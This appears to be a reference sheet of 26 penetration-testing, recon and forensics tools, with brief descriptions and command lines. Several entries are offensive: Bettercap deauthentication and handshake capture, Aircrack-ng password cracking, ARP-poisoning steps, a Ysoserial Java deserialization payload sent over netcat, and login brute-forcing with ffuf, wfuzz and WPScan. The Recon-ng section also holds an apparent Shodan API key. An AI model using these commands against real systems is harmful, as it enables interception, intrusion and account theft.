Reference List
    1. Lynis
    2. BeEF
    3. Autopsy
    4. King Phisher
    5. Yersinia
    6. SocialEngineeringToolkit
    7. Ettercap
    8. Bettercap
    9. AirCrack-ng
    10. LazyRecon
    11. Wapiti
    12. SpiderFoot
    13. Ysoserial
    14. NoSQLMap
    15. MobSF
    16. JADX
    17. Frida
    18. Recon-ng
    19. WPScan
    20. Naabu
    21. FFUF
    22. wFuzz
    23. DirSearch
    24. SubFinder
    25. HTTPx
    26. EyeWitness

Lynis – An auditing tool for Unix-based systems. It scans the system by performing many security control checks [Link].

sudo apt install lynis
sudo lynis audit system
sudo lynis -Q --cronjob

BeEF – It is classified as a penetration testing tool that focuses on the web browser, but in fact it is a very malicious tool that can be used to exploit web vulnerabilities. Its phishing features are impressive and can mimic Gmail or Facebook login pages, for example [Link].

sudo apt install beef-xss
sudo beef-xss

It will ask you to set a new password.

In the browser, open the BeEF web interface. The default user is beef.

Autopsy – A digital forensics tool used by law enforcement officials to investigate what happened on a computer, hard drive, or flash drive [Link].

sudo autopsy


sudo autopsy &

On the browser go to http://localhost:9999/autopsy.

King Phisher – A tool for Phishing Awareness Campaign [Link].

sudo systemctl start postgresql
sudo systemctl start king-phisher
cd /usr/share/king-phisher/
sudo ./KingPhisherServer server_config.yml

If port 80 is already in use, you will have to kill the process that holds it (e.g. PID 123456):

sudo netstat -tulpn
sudo kill 123456

Leave it running in one terminal and on another terminal:

cd /usr/share/king-phisher

Kali Linux already has it installed and it is accessible from the main menu.

Yersinia – A DHCP starvation attack tool. An attacker can make the DHCP server inoperative and take over as the DHCP server of the network, usually assigning themselves as the DNS server and directing users to malicious websites [Link].

sudo apt install yersinia
sudo yersinia -G

SocialEngineeringToolkit – SET is an open-source penetration testing framework with a large number of custom attack vectors [Link].

sudo setoolkit

Ettercap – Man-in-the-middle attack tool using ARP poisoning [Link].

  • Select the interface(s) used for the attack and click the accept button,
  • Scan the network for hosts, list them, and add the targets to target groups 1 and 2,
  • In the MITM menu, select ARP poisoning,
  • If sniffing has not started yet, start it,
  • Now check the ARP table on both devices and compare the entries with the real MAC addresses,
  • On the man-in-the-middle box, use Wireshark or tcpdump, for example, to capture the packets being transmitted between both targets.

Bettercap – An alternative to Ettercap with additional features such as Wi-Fi support [Link].

sudo apt install bettercap
sudo bettercap --iface wlan0
>> wifi.recon on
>> events.ignore
>> set net.sniff.output handshake.pcap
>> net.sniff on
>> events.ignore net.sniff.802.11
>> 11
>> wifi.deauth FF:FF:FF:FF:FF:FF
>> events.ignore wifi.client.probe

AirCrack-ng – A suite consisting of a detector, packet sniffer, WEP/WPA/WPA2-PSK cracker, and analysis tool for 802.11 wireless networks [Link].

sudo apt install aircrack-ng
sudo aircrack-ng handshake.pcap -w /usr/share/wordlists/rockyou.txt.gz

LazyRecon – A very straightforward scanner intended to automate some of the tedious tasks of reconnaissance and information gathering, presenting the results as an HTML report [Link].

git clone
./ -d -e

Wapiti – A web application security scanner. It performs “black-box” scans (it does not study the source code) by crawling the web application's pages looking for scripts and forms where it can inject data, and produces an HTML report [Link].

wapiti -u

SpiderFoot – It uses OSINT to gather information about a specific target of an investigation. It crawls websites looking for IPs, domains/sub-domains, hostnames, network subnets (CIDR), autonomous system numbers (ASN), e-mail addresses, phone numbers, usernames, people's names, and Bitcoin addresses. Then, using 200+ modules, it can gather even more information about them, for example the transactions and balance of the discovered Bitcoin addresses [Link].

sudo spiderfoot -m sfp_spider,sfp_bitcoin,sfp_blockchain -s -F BITCOIN_ADDRESS,BITCOIN_BALANCE -q
sudo spiderfoot -m sfp_spider,sfp_ethereum -s -F ETHEREUM_ADDRESS -q

Ysoserial – A collection of utilities for exploiting Java applications that perform unsafe deserialization of objects and use vulnerable libraries, in order to get remote code execution [Link].

java -jar ysoserial.jar CommonsCollections4 ncat 8888 > payload
cat payload | nc 123456

First, Ysoserial was used to create a Java payload for the chosen gadget chain and the remote command to be executed. Then the payload was sent over the netcat connection to the port where the example's vulnerable application was listening.

NoSQLMap – A tool designed to automate injection attacks and exploit default configuration weaknesses in NoSQL databases (such as MongoDB) and web apps using NoSQL [Link].

git clone

MobSF – Mobile Security Framework is a mobile application (Android/iOS/Windows) malware analyzer. It is capable of performing static and dynamic analysis in a sandbox and generating reports [Link].

git clone
cd Mobile-Security-Framework-MobSF

Then open http://localhost:8000/ in the web browser.

Upload the app file (an APK, for example) and explore the available features.

JADX – A CLI and GUI decompiler that produces Java source code from Android Dex and APK files [Link]. See also Dex2Jar [Link] and JAD [Link].

sudo apt install jadx
jadx app.apk

Frida – A dynamic binary instrumentation framework and toolkit for developers, reverse engineers, and security researchers [Link].

pip install frida-tools


docker run --security-opt seccomp:unconfined -it name_of_the_docker /bin/bash

Basic commands:

  • frida-ps
    • List the names and PIDs of all running processes.
  • frida-ps -U
    • List the processes on a USB-attached device.
  • frida-ls-devices
    • List all attached devices.
  • frida-trace -U Twitter -i "recv*"
    • Trace native API calls matching recv* in the Twitter process on the USB-attached device.

Recon-ng – A web reconnaissance framework designed exclusively for web-based open-source reconnaissance [Link].

> marketplace search contacts
> marketplace install recon/domains-contacts/whois_pocs
> modules load recon/domains-contacts/whois_pocs
  > info
  > options unset SOURCE
  > options set SOURCE
  > run
  > back
> marketplace search domain
> marketplace install recon/domains-hosts/bing_domain_web
> modules load recon/domains-hosts/bing_domain_web
  > options set SOURCE
  > run
> marketplace search google
> marketplace install recon/domains-hosts/google_site_web
> modules load recon/domains-hosts/google_site_web
  > options set SOURCE
  > run
> marketplace search interesting
> marketplace install discovery/info_disclosure/interesting_files
> modules load discovery/info_disclosure/interesting_files
  > options set PORT 443
  > options set PROTOCOL https
  > run
> shell ls ~/.recon-ng/workspaces/default/
> marketplace search shodan
> marketplace install recon/domains-hosts/shodan_hostname
> keys add Y9yraMjfdgUTSy9Z5okhnDQeWadPw2dP
> modules load recon/domains-hosts/shodan_hostname
  > options set SOURCE
  > run
> show hosts
> show contacts
> workspaces create new
> show hosts
> workspaces list
> workspaces load default
> db schema
> db delete hosts
> db insert hosts
> marketplace search report
> marketplace install reporting/html
> modules load reporting/html
  > options set CREATOR MyName
  > options set CUSTOMER MyClient
  > run
> exit

Web Interface

locate recon-web

WPScan – A free WordPress security scanner [Link].

wpscan --update
wpscan --url
wpscan --url --enumerate p
wpscan --url --enumerate u
wpscan --url --enumerate t
wpscan --url --enumerate tt
wpscan --url --proxy
wpscan --url --wordlist word.lst --threads 50 --username admin

Naabu – A simple and fast port scanner that enumerates open ports using a SYN scan against a host or a list of hosts [Link].

docker pull projectdiscovery/naabu
docker run -it projectdiscovery/naabu -host -silent
docker run -it projectdiscovery/naabu -host -silent -p -
docker run -it projectdiscovery/naabu -host -silent -iL hosts.txt
docker run -it projectdiscovery/naabu -host -silent -nmap-cli 'nmap -sV'
docker run -it projectdiscovery/naabu -host -silent -o output.txt
docker run -it projectdiscovery/naabu -host -silent -interface eth0
docker run -it projectdiscovery/naabu -host -silent -source-ip

FFUF – Fuzzing tool for web applications [Link].

sudo apt install golang-go
go get -u
~/go/bin/ffuf -V


sudo apt install ffuf
ffuf -V


ffuf -u -w word.lst
ffuf -u -w word.lst
ffuf -u -w word.lst -c
ffuf -u -w word.lst -sf
ffuf -u -w word.lst -recursion -e .bak
ffuf -u -w word.lst -s -of html -o output.txt
ffuf -u -w domain.lst:W1 -w word.lst:W2
ffuf -u -X POST -d "username=W1\&password=W2" -w users.lst:W1 -w passes.lst:W2
ffuf -u -w word.lst -x http://proxy:port
ffuf -u -w word.lst -x socks5://

wFuzz – Another fuzzing tool for web applications [Link].

wfuzz -c --hc 404 -w word.lst
wfuzz -c -z file,users.lst -z file,passes.lst -d "log=FUZZ&pwd=FUZ2Z"

DirSearch – x [Link].

git clone
cd dirsearch
pip3 install -r requirements.txt
./ -u
./ -e php,asp,cgi -w word.lst -r -R 5 -t50 -m POST --data "username=admin" -u

SubFinder – Designed to discover valid subdomains using passive online sources [Link].

sudo apt install subfinder -y
subfinder -d
subfinder -d -silent
subfinder -v -d
subfinder -dL domains.txt

HTTPx – x [Link].

git clone; cd httpx/cmd/httpx; go build; sudo mv httpx /usr/local/bin/; httpx -version
echo | httpx
echo | httpx -silent
subfinder -d -silent | httpx -silent

EyeWitness – Automates taking screenshots of websites and records the server headers [Link].

sudo apt install eyewitness
eyewitness -f list.txt